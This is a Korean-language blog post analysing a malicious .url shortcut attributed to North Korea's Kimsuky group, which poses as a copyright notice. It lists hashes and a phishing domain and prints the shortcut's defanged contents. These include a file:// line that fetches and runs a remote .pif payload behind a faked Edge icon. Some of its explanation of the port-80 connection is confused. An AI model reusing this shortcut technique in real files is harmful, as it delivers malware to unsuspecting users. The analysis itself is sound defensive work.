북한 해킹 단체 김수키(Kimsuky)에서 만든 저작권 사칭 관련 악성코드-저작권관련내역.url(2025.3.21)

오늘은 정말로 존경 하나도 하지 않은 민폐인 북한 해킹 단체 김수키(Kimsuky)에서 만든 저작권 사칭 관련 악성코드-저작권관련내역.url(2025.3.21)에 대해 알아보겠습니다.
해당 악성코드는 저작권 관련해서 사칭하는 것을 볼 수가 있으며 제목 또한 저작권관련내역.url으로 보면 쉽게 추측할 수 있습니다.
파일명:저작권관련내역(.)url
사이즈:1 MB
MD5:66bd429d02479a029a25ccacc0d134b3
SHA-1:2e6ab2f8e5a24c9d9acde16589cfd34d0ee5b5c0
SHA-256:755e3c5c62ac683bbea831255c4ee3bcb639232efab95a42bfa77b5322b3fd9c
invoice-docs-file(.)site 도메인은 멀웨어 활동과 연관돼 있으며 Spamhaus DBL 에도 당당하게 등록된 도메인이며 피싱(Phishing) 공격에 많이 사용된 도메인

악성코드 내부 모습

악성코드 포함된 코드

[{009862A0-0000-0000-C000-000000005986}]
Prop3=19,2
[InternetShortcut]
IconIndex=11
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
IDList=
URL=fi(l)e://invoice-docs-file(.)site@80/Downloads/ready(.)pif
HotKey=0
[{000214A0(-)0000(-)0000-C000-000000000046}]
Prop3=19,9

코드 분석

인터넷 바로 가기(Internet Shortcut) 로 위장
1. 파일 확장자 및 형식
(.)url 파일은 단순한 텍스트 포맷의 바로가기 파일
하지만, 내부 URL= 항목을 조작하여 악성코드 실행을 유도
2.악성 URL 포맷
f(i)le://->로컬 파일 시스템 접근
invoice-docs(-)file(.)site@80->도메인을 가장한 사용자명
실제 연결은 80 포트의 로컬 서버로 시도
phishing 기법으로 사람에게는 invoice-docs-file(.)site 라는 도메인처럼 보이지만 실제로는 80/Downloads/ready(.)pif 를 참조하는 방식
Windows에서는 해당 URL을 f(i)le:// 로 시작하므로 로컬 파일을 실행하려는 시도로 해석도 가능
ready.pif->.pif 확장자는 옛날 윈도우 에서 사용하는 Program Information File
실제로는 실행 파일(.exe)처럼 작동 쉽게. pif로 만들어져 유포되었으며 EXE 확장자와 같은 실행 가능한 파일
2021년 2021년 국방부 업무보고 수정 로 위장해서 공격했을 때 해당 비슷하게 악용

Pestudio 결과

악성코드가. pif 확장자를 사용해 감염을 우회하려는 시도가 빈번하며 대부분의 백신 프로그램 이 .pif 파일을 경고 대상으로 간주함
3. 아이콘 변경 (사회공학 기법)
해당 파일이 Microsoft Edge 아이콘을 사용하도록 설정되어 있음
사용자가 이 바로 가기를 클릭했을 때 진짜 웹 브라우저로 착각하도록 유도
매우 전형적인 사회공학적 공격 수법
4. GUID 블록 분석
해당 Windows Shell이 내부적으로 사용하는 GUID 파일의 속성 정보를 나타내면 Windows 탐색기에서 메타데이터나 캐시와 관련된 정보일 가능성도 생각할 수가 있습니다.
2025-03-19 04:18:09 UTC에서는 BitDefender 와 BitDefender 엔진을 사용하는 보안 업체들만 탐지하는 것 같습니다.
아무튼, 현행범